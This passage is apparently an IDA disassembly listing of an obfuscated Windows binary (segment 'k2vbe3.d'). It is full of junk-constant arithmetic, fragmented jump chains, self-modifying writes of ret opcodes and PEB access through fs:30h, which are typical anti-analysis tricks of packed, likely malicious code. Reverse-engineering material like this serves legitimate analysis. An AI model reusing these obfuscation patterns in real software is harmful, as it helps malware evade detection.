; FUNCTION CHUNK AT 0045B35D SIZE 00000005 BYTES

		add	edx, 0E82D604Ah
		mov	[edx], eax
		pop	edx
		lea	eax, sub_44B359
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B35D
sub_448CC1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

loc_448CD8:				; CODE XREF: sub_45BE94-F0AFj
		mov	eax, edx
		jmp	loc_446672
; END OF FUNCTION CHUNK	FOR sub_45BE94
; ---------------------------------------------------------------------------

loc_448CDF:				; CODE XREF: k2vbe3.d:0044040Fj
		add	ebx, ebp
		pushf
		push	ecx
		mov	[ebp+0], eax
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_448CE6:				; CODE XREF: sub_44067C-27Aj
		xor	ebx, 4B6A097Ah
		add	ebx, 4BEE55F6h
		jmp	loc_43E41A
; END OF FUNCTION CHUNK	FOR sub_44067C
; ---------------------------------------------------------------------------

loc_448CF7:				; CODE XREF: k2vbe3.d:loc_442A79j
					; k2vbe3.d:loc_452242j
		mov	eax, large fs:30h
		add	eax, 20h
		mov	eax, [eax]
		push	edx
		push	3D7638D2h
		jmp	loc_44B36E
; ---------------------------------------------------------------------------

loc_448D0E:				; CODE XREF: k2vbe3.d:0043E972j
		cmp	ebx, 48983490h
		jmp	loc_44D97B
; ---------------------------------------------------------------------------
		or	ebp, ebx
		jmp	sub_450453
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_448D20:				; CODE XREF: sub_44D0D5:loc_453A97j
		sub	ecx, 0BC26E9D6h

loc_448D26:				; CODE XREF: sub_43D0A9:loc_458448j
		push	esi
		and	ebx, 0BCD7FAE1h
		jmp	loc_443046
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DD4

loc_448D32:				; CODE XREF: sub_448DD4+9j
		mov	[ebp-8], eax
		jmp	loc_43C035
; END OF FUNCTION CHUNK	FOR sub_448DD4

; =============== S U B	R O U T	I N E =======================================



sub_448D3A	proc near		; CODE XREF: sub_44EB59-10F66j
					; sub_445F22-70CEp ...

; FUNCTION CHUNK AT 004460B8 SIZE 00000005 BYTES

		push	offset loc_458B7A
		jmp	loc_4460B8
sub_448D3A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448AE2

loc_448D44:				; CODE XREF: sub_448AE2:loc_4562ADj
		jz	loc_44EFE7
		jmp	loc_442F95
; END OF FUNCTION CHUNK	FOR sub_448AE2
; ---------------------------------------------------------------------------
		push	1FEB248Bh
		jmp	sub_45080C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_448D59:				; CODE XREF: sub_44D0D5-231Dj
		jbe	loc_44E2C4
		or	edi, 2A59FAFEh

loc_448D65:				; CODE XREF: sub_44D0D5:loc_44E108j
		push	offset loc_4516F7
		jmp	loc_44F76F
; END OF FUNCTION CHUNK	FOR sub_44D0D5

; =============== S U B	R O U T	I N E =======================================



sub_448D6F	proc near		; CODE XREF: sub_40C8FC+191p
					; sub_448D6F+5j
					; DATA XREF: ...
		call	sub_448D7F
		jmp	ds:off_41E124
sub_448D6F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CE6

loc_448D7A:				; CODE XREF: sub_446CE6+F8B8j
		jmp	nullsub_421
; END OF FUNCTION CHUNK	FOR sub_446CE6

; =============== S U B	R O U T	I N E =======================================



sub_448D7F	proc near		; CODE XREF: sub_456C5F:loc_442697j
					; sub_448D6Fp ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E9C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EA7E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F01D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F196 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00440E1A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004442FF SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447F3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004491E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D797 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044DF3C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E9EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004500EE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004508FF SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00453830 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004567E6 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004587B2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458843 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00458992 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A0E8 SIZE 00000008 BYTES

		jo	loc_4567E6
		pop	edx
		mov	eax, [esp+4+var_4]
		jmp	loc_4491E6
sub_448D7F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EBB

loc_448D8E:				; CODE XREF: sub_454EBB+FCBj
		inc	dword ptr [ebp-8]
		push	offset sub_4588FD
		jmp	loc_43E329
; END OF FUNCTION CHUNK	FOR sub_454EBB

; =============== S U B	R O U T	I N E =======================================



sub_448D9B	proc near		; CODE XREF: k2vbe3.d:00441EE2j
					; sub_459371-A3D8p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004414E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449095 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xchg	ebp, [esp-4+arg_0]
		mov	ebx, offset loc_4538A1
		jmp	loc_4414E5
sub_448D9B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_448DAC:				; CODE XREF: sub_43C82E:loc_45A678j
		jns	loc_43E1FE
		and	edi, eax
		jmp	loc_4476C1
; END OF FUNCTION CHUNK	FOR sub_43C82E
; ---------------------------------------------------------------------------
		push	ebx
		push	0FE9B9E69h
		pop	ebx
		rol	ebx, 12h
		xor	ebx, 0E64EFECAh
		jmp	loc_45A31E
; ---------------------------------------------------------------------------

loc_448DCE:				; CODE XREF: k2vbe3.d:0043DC9Fj
		jp	loc_459FAD

; =============== S U B	R O U T	I N E =======================================



sub_448DD4	proc near		; CODE XREF: sub_4475D5+Fp

; FUNCTION CHUNK AT 0043C035 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F3F2 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044769D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044871B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00448803 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448D32 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044913F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045892C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004590E0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004598C8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045BDA1 SIZE 0000001A BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	sub_4402FA
		jmp	loc_448D32
sub_448DD4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		or	esi, edx
		jmp	sub_44D316
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_448DE9:				; CODE XREF: sub_446E24+144B4j
		jbe	nullsub_434

loc_448DEF:				; CODE XREF: k2vbe3.d:0044193Bj
					; sub_44D298-4361j ...
		jz	loc_44A786
		cmp	dword ptr [ebp-4], 2
		jnz	loc_443B4B
		jmp	loc_4589BA
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_448E04:				; CODE XREF: sub_440C94+C2EFj
		jb	loc_451956

loc_448E0A:				; CODE XREF: sub_440C94:loc_4523E6j
		mov	eax, [esp+0]
		push	eax
		call	sub_448D3A
		or	eax, eax
		jnz	loc_43D06C
		jmp	loc_4537FD
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
		jnp	loc_453CB0
		sub	eax, 30F96105h
		jmp	sub_458D80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B70

loc_448E31:				; CODE XREF: sub_453B70+5j
		jmp	ds:dword_41E180
; END OF FUNCTION CHUNK	FOR sub_453B70
; ---------------------------------------------------------------------------

loc_448E37:				; CODE XREF: k2vbe3.d:004579C2j
		jmp	loc_4586F2
; ---------------------------------------------------------------------------

loc_448E3C:				; CODE XREF: k2vbe3.d:0044BFBCj
		jmp	loc_44D759
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_22. PRESS	KEYPAD "+" TO EXPAND]
		dd offset sub_4478AB
; ---------------------------------------------------------------------------
		jmp	loc_45AAB8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_98. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_448E4C:				; CODE XREF: sub_4580DF+350Fj
		jmp	loc_4521F6
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_448E51:				; CODE XREF: sub_454AD4-7B86j
		jmp	loc_44AAF0
; END OF FUNCTION CHUNK	FOR sub_454AD4

; =============== S U B	R O U T	I N E =======================================



sub_448E56	proc near		; CODE XREF: sub_445159-50FCp
					; k2vbe3.d:0044A564j

; FUNCTION CHUNK AT 0044FCA0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045ADA4 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	esi
		mov	esi, ebx
		xchg	esi, [esp+0]
		jmp	loc_45ADA4
sub_448E56	endp

; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp]
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_448E6B:				; CODE XREF: sub_444EFA:loc_456DA5j
		mov	ecx, [esp+arg_C]
		mov	dword ptr [ecx], 10001h
		lea	eax, sub_445321
; END OF FUNCTION CHUNK	FOR sub_444EFA
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_448E7B:				; CODE XREF: sub_44D298+3D37j
		jmp	loc_442158
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_448E80:				; CODE XREF: sub_44DB59:loc_450731j
		shr	ecx, 8
		shl	ebx, 1Dh
		sub	eax, 0BF417E44h
		jmp	loc_45909B
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_448E91:				; CODE XREF: sub_43FF90:loc_43CB83j
		jl	loc_454760
		push	6D32ADE6h

loc_448E9C:				; CODE XREF: sub_43FF90:loc_443D83j
		add	ecx, 808FE509h
		xchg	ecx, [esp+4+var_4]
		jmp	loc_45B6AC
; END OF FUNCTION CHUNK	FOR sub_43FF90
; ---------------------------------------------------------------------------

locret_448EAA:				; CODE XREF: k2vbe3.d:loc_45C0F6j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_448EAB:				; CODE XREF: sub_43CCD0+15C69j
		jmp	loc_44A3DD
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------

loc_448EB0:				; CODE XREF: k2vbe3.d:00448369j
		xor	ebp, ecx
		jp	loc_44B968

loc_448EB8:				; CODE XREF: k2vbe3.d:0044835Dj
		xor	edx, 0DFB1E265h

loc_448EBE:				; CODE XREF: k2vbe3.d:004566AAj
		add	edx, ebp
		push	offset sub_459E22
		jmp	loc_4498E1
; ---------------------------------------------------------------------------

loc_448ECA:				; CODE XREF: k2vbe3.d:0044199Ej
		jns	loc_443C6D
		mov	ecx, [edx]
		pushf
		jmp	loc_45207A
; ---------------------------------------------------------------------------

loc_448ED8:				; CODE XREF: k2vbe3.d:loc_447303j
		cmp	edi, 82C6B91Ah
		jmp	loc_44530B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_448EE3:				; CODE XREF: sub_44921C-B8C1j
		add	esi, 294B2817h

loc_448EE9:				; CODE XREF: sub_44921C-B8C8j
		xor	eax, 0D6052B15h
		push	edx
		push	0FA1F9758h
		xchg	ebp, [esp+4+var_4]
		mov	edx, ebp
		pop	ebp
		jmp	loc_44C5EF
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451759

loc_448F00:				; CODE XREF: sub_451759-4504j
		push	edi

loc_448F01:				; CODE XREF: k2vbe3.d:00440634j
		push	56A5FB5h
		pop	edi
		and	edi, 79B67C3Eh
		add	edi, 0FF222EDDh
		xchg	edi, [esp+4+var_4]
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_451759
; ---------------------------------------------------------------------------

loc_448F1B:				; CODE XREF: k2vbe3.d:loc_444B70j
		xchg	edi, [esp]
		mov	esi, edi
		pop	edi
		call	sub_444A1A
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_448F26:				; CODE XREF: sub_44469A+179EAj
		jmp	loc_43CAEC
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4506C3

loc_448F2B:				; CODE XREF: sub_4506C3-2F6Fj
		jmp	loc_44643F
; END OF FUNCTION CHUNK	FOR sub_4506C3
; ---------------------------------------------------------------------------

loc_448F30:				; CODE XREF: k2vbe3.d:0044159Aj
		jmp	sub_4508A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_448F35:				; CODE XREF: sub_44D298+287Dj
		sub	ebp, eax
		jmp	loc_448DEF
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------

loc_448F3C:				; CODE XREF: k2vbe3.d:loc_441931j
		cmp	dword ptr [ebp-4], 1
		jnz	loc_448DEF
		jmp	loc_44C761
; ---------------------------------------------------------------------------
		xchg	eax, [esi]
		jmp	sub_4469E1
; ---------------------------------------------------------------------------
		cmp	esi, 0D2722E5Bh
		jmp	loc_43E4C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458B9B

loc_448F5D:				; CODE XREF: sub_458B9B+9j
		jz	loc_441F93
		jmp	loc_441219
; END OF FUNCTION CHUNK	FOR sub_458B9B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457580

loc_448F68:				; CODE XREF: sub_457580-423j
		push	99A142E1h

loc_448F6D:				; CODE XREF: sub_457580:loc_45B7E9j
		call	sub_448F78
		retn
; END OF FUNCTION CHUNK	FOR sub_457580
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_448F73:				; CODE XREF: sub_443BDF:loc_44C529j
					; k2vbe3.d:0044CD63j
		jmp	loc_4532B7
; END OF FUNCTION CHUNK	FOR sub_443BDF

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_448F78	proc near		; CODE XREF: sub_4563FD:loc_43DAC8p
					; sub_457580:loc_448F6Dp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00447E42 SIZE 00000016 BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_447E42
sub_448F78	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_219. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454447

loc_448F81:				; CODE XREF: sub_454447+6j
		jmp	loc_453D37
; END OF FUNCTION CHUNK	FOR sub_454447
; ---------------------------------------------------------------------------

loc_448F86:				; CODE XREF: k2vbe3.d:00444E46j
		xchg	eax, [esp]
		pop	eax
		pop	edx
		jnz	loc_443E40
		mov	eax, [esp]
		call	sub_441DCC
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_448F99:				; CODE XREF: sub_44B999:loc_458EDDj
		or	eax, eax
		jnz	loc_459D8A
		jmp	loc_44FD96
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------

loc_448FA6:				; CODE XREF: k2vbe3.d:0045856Bj
		jz	sub_43DDA1
		mov	[edi], eax
		pop	ebp
; START	OF FUNCTION CHUNK FOR sub_4488D6

loc_448FAF:				; CODE XREF: sub_4488D6-8ECAj
		add	eax, 0A9D51947h
		xchg	eax, [esp+4+var_4]
		jmp	sub_4414DA
; END OF FUNCTION CHUNK	FOR sub_4488D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444144

loc_448FBD:				; CODE XREF: sub_444144:loc_44D2D6j
		jnz	loc_457027
		sbb	ebx, ecx
		sbb	ecx, ebx
		jmp	loc_44C68B
; END OF FUNCTION CHUNK	FOR sub_444144

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_448FCC	proc near		; CODE XREF: sub_44D092+4p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440FCF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004455B6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459242 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		mov	[ebp+var_4], eax
		jmp	loc_440FCF
sub_448FCC	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_177. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_448FDB	proc near		; DATA XREF: k2vbe3.d:loc_44DDCFo

; FUNCTION CHUNK AT 0043EDDE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045941D SIZE 00000005 BYTES

		mov	eax, [esp+0]
		push	edx
		call	sub_444FB1
		mov	eax, 1C5E06BAh
		call	sub_4553CC
		mov	ds:off_41E114, eax
		lea	eax, sub_44CB04
		jmp	loc_45941D
sub_448FDB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441172

loc_448FFF:				; CODE XREF: sub_441172+F8C9j
		sbb	edx, ecx
		jmp	loc_44631A
; END OF FUNCTION CHUNK	FOR sub_441172

; =============== S U B	R O U T	I N E =======================================



sub_449006	proc near		; CODE XREF: k2vbe3.d:loc_4452AAp
					; k2vbe3.d:004479E3j

; FUNCTION CHUNK AT 004432A0 SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	ds:dword_445E50, eax
		call	sub_4436CE
		mov	edx, 0A2CD59D9h
		jmp	loc_4432A0
sub_449006	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		pop	edi
		jmp	loc_442F4A
; ---------------------------------------------------------------------------

loc_449024:				; CODE XREF: k2vbe3.d:00456068j
		jo	loc_4418C1

loc_44902A:				; CODE XREF: k2vbe3.d:loc_456043j
		add	edx, 0AC1D4296h
		cmp	edx, 44600A77h
		jmp	loc_453826
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_44903B:				; CODE XREF: sub_43C3A9:loc_4567FAj
		xchg	edx, [esp+0]
		mov	ebp, esp
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+4+var_4]
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_44285C
		jmp	loc_44E266
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_428. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E503

loc_449055:				; CODE XREF: sub_44E503+9F63j
		jmp	loc_4541AC
; END OF FUNCTION CHUNK	FOR sub_44E503
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44905A:				; CODE XREF: sub_44C90E-DC01j
		jmp	loc_444B01
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F557

loc_44905F:				; CODE XREF: sub_44F557+13j
		xchg	edi, [esp+0]
		jmp	loc_449E30
; END OF FUNCTION CHUNK	FOR sub_44F557

; =============== S U B	R O U T	I N E =======================================



sub_449067	proc near		; CODE XREF: sub_414D0E+5Ep
					; sub_41B3E7+642p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C8F1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043EBE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F19C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044449E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004460E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F39D SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044F665 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F73A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00454D40 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004584EE SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00458AE6 SIZE 00000005 BYTES

		push	esi
		push	0EAA3E349h
		pop	esi
		rol	esi, 14h
		sub	esi, 0B6C2C1DCh
		jmp	loc_43EBE7
sub_449067	endp

; ---------------------------------------------------------------------------
		jg	sub_4440B5
; START	OF FUNCTION CHUNK FOR sub_446478

loc_449082:				; CODE XREF: sub_446478:loc_442EAEj
		jmp	sub_43CF52
; END OF FUNCTION CHUNK	FOR sub_446478
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_449087:				; CODE XREF: sub_4553CC-400Dj
		jle	loc_45A2E4
		shl	eax, 15h
		jmp	loc_44BE3E
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D9B

loc_449095:				; CODE XREF: sub_448D9B:loc_4414E5j
		call	sub_44C564
; END OF FUNCTION CHUNK	FOR sub_448D9B
; START	OF FUNCTION CHUNK FOR sub_44B8EF

loc_44909A:				; CODE XREF: sub_44B8EF+9F85j
		jmp	loc_45311D
; END OF FUNCTION CHUNK	FOR sub_44B8EF
; ---------------------------------------------------------------------------

locret_44909F:				; CODE XREF: k2vbe3.d:loc_457F88j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_4490A0:				; CODE XREF: sub_4426DF-4B84j
		jmp	loc_450AA7
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_4490A5:				; CODE XREF: sub_4553CC-1596Fj
		jnp	loc_452065
		mov	edx, ebp
		jmp	loc_450DC3
; END OF FUNCTION CHUNK	FOR sub_4553CC

; =============== S U B	R O U T	I N E =======================================



sub_4490B2	proc near		; DATA XREF: sub_448D7F+FACFo

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004449D3 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00446CBF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00447752 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004490C1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A8C6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004550E7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456BE1 SIZE 0000000E BYTES

		pop	edi

loc_4490B3:				; CODE XREF: k2vbe3.d:loc_44D97Bj
		lea	eax, loc_446CBF
		mov	byte ptr [eax],	0C3h

loc_4490BC:				; CODE XREF: sub_43F027j
		jmp	loc_446CBF
sub_4490B2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B2

loc_4490C1:				; CODE XREF: sub_4490B2:loc_446CBFj
		xchg	ebp, [esp-4+arg_0]
		mov	edx, ebp
		pop	ebp
		jmp	loc_44A8C6
; END OF FUNCTION CHUNK	FOR sub_4490B2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_458. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EFDA

loc_4490CD:				; CODE XREF: sub_43EFDA+4j
					; k2vbe3.d:00457481j
		jmp	loc_4548E6
; END OF FUNCTION CHUNK	FOR sub_43EFDA
; ---------------------------------------------------------------------------

loc_4490D2:				; CODE XREF: k2vbe3.d:00456CFAj
		jmp	loc_4594CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_4490D7:				; CODE XREF: sub_44F028+6EE9j
		jmp	loc_443191
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447266

loc_4490DC:				; CODE XREF: sub_447266+221Dj
		jmp	sub_4545C4
; END OF FUNCTION CHUNK	FOR sub_447266
; ---------------------------------------------------------------------------

loc_4490E1:				; CODE XREF: k2vbe3.d:0044232Fj
		jmp	loc_4419C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_4490E6:				; CODE XREF: sub_44469A-4B3Bj
		jmp	loc_44A350
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------

loc_4490EB:				; CODE XREF: k2vbe3.d:00441B01j
		pushf
		sbb	ebp, 0FD06FD44h
		sbb	edx, 8097A07Dh
		ror	ebp, 1Fh
; START	OF FUNCTION CHUNK FOR sub_441AE3

loc_4490FB:				; CODE XREF: sub_441AE3+10j
		and	ebx, 84956EB3h
		add	ebx, 0FBC06409h
		xchg	ebx, [esp-8+arg_4]
		jmp	loc_458EC1
; END OF FUNCTION CHUNK	FOR sub_441AE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_44910F:				; CODE XREF: sub_4461D5+CE01j
		js	loc_454411

loc_449115:				; CODE XREF: sub_4461D5:loc_44C213j
		push	edi
		mov	edi, ebx
		xchg	edi, [esp+4+var_4]
		jmp	loc_43FFD2
; END OF FUNCTION CHUNK	FOR sub_4461D5
; ---------------------------------------------------------------------------

loc_449120:				; CODE XREF: k2vbe3.d:0043C4DFj
		sbb	ebx, esi
; START	OF FUNCTION CHUNK FOR sub_45530F

loc_449122:				; CODE XREF: sub_45530F-18E43j
		add	ebx, 5E61A84Dh
		xchg	ebx, [esp+0]
		jmp	loc_44B0A3
; END OF FUNCTION CHUNK	FOR sub_45530F
; ---------------------------------------------------------------------------
		ja	loc_441AD2
		ror	ebp, 1Dh
		jmp	sub_44F123
; ---------------------------------------------------------------------------

locret_44913E:				; CODE XREF: k2vbe3.d:0045BA17j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DD4

loc_44913F:				; CODE XREF: sub_448DD4+12FDBj
		jmp	loc_43F3FA
; END OF FUNCTION CHUNK	FOR sub_448DD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_449144:				; CODE XREF: sub_43CCD0+7381j
		jmp	loc_44A3EE
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_449149:				; CODE XREF: sub_44469A:loc_44147Fj
		jmp	loc_43E51E
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_44914E:				; CODE XREF: sub_4570C0-5506j
		cmp	edx, esi
		jmp	loc_4424FB
; END OF FUNCTION CHUNK	FOR sub_4570C0
; ---------------------------------------------------------------------------

loc_449155:				; CODE XREF: k2vbe3.d:loc_43CEAAj
		mov	esi, [edi]
		jb	loc_4417F0
		jmp	loc_444A0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E360

loc_449162:				; CODE XREF: sub_43E360+1DA9Bj
		push	eax
		push	0FFFFFFFFh
		push	eax
		call	sub_45325C
		jmp	loc_45C1B5
; END OF FUNCTION CHUNK	FOR sub_43E360
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_503. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_449171:				; CODE XREF: sub_443A30:loc_455CE8j
		jmp	loc_4501BF
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504F3

loc_449176:				; CODE XREF: sub_4504F3-14344j
		jmp	loc_43C738
; END OF FUNCTION CHUNK	FOR sub_4504F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448159

loc_44917B:				; CODE XREF: sub_448159-8DA9j
		and	esi, 0D06D6E7Ah
		sub	esi, 4F2D594Eh
		add	esi, 8F24D1E0h
		mov	[esi], eax
		jmp	loc_444F45
; END OF FUNCTION CHUNK	FOR sub_448159
; ---------------------------------------------------------------------------

loc_449194:				; CODE XREF: k2vbe3.d:00451B27j
		pop	esi
		add	esi, 42924A23h
		or	esi, 349C8281h
		add	esi, 0EF2516EBh
		xor	esi, 985BF8ABh
		add	esi, 0C2EB669Eh
		jmp	loc_44C6C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DCC

loc_4491B8:				; CODE XREF: sub_441DCC-43D1j
